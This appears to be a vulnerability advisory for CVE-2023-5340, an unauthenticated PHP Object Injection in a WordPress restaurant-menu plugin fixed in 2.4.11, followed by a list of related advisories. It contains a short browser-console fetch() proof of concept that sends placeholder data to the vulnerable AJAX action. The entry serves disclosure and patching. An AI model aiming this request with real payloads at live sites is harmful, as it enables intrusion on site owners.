Five Star Restaurant Menu and Food Ordering < 2.4.11 – Unauthenticated PHP Object Injection | CVE 2023-5340 | Plugin Vulnerabilities

Description

The plugin unserializes user input via an AJAX action available to unauthenticated users, allowing them to perform PHP Object Injection when a suitable gadget is present on the blog.

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog unauthenticated

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"action": "fdm_update_cart_item", "options": "data-to-unserialize"}),
  "method": "POST",
  "credentials": "include"
});

Affects Plugins

food-and-drink-menu

Fixed in 2.4.11

References

CVE

Classification

Type

OBJECT INJECTION

OWASP top 10

A8: Insecure Deserialization

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

91a5847a-62e7-4b98-a554-5eecb6a06e5b

Timeline

Publicly Published

2023-10-27 (about 2 years ago)

Added

2023-10-27 (about 2 years ago)

Last Updated

2023-10-27 (about 2 years ago)

Other

Published

Title

Published

2023-10-17

Title

Themify Ultra < 7.3.6 - Authenticated (Subscriber+) PHP Object Injection

Published

2025-09-23

Title

DentiCare < 1.4.3 - Unauthenticated PHP Object Injection

Published

2025-01-21

Title

AI Power: Complete AI Pack < 1.8.97 - Authenticated (Admin+) PHP Object Injection via wpaicg_export_prompts

Published

2023-01-11

Title

WOOF - Products Filter for WooCommerce < 1.3.2 - Admin+ PHP Object Injection

Published

2022-08-17

Title

WPvivid Backup < 0.9.75 - Admin+ PHAR Deserialization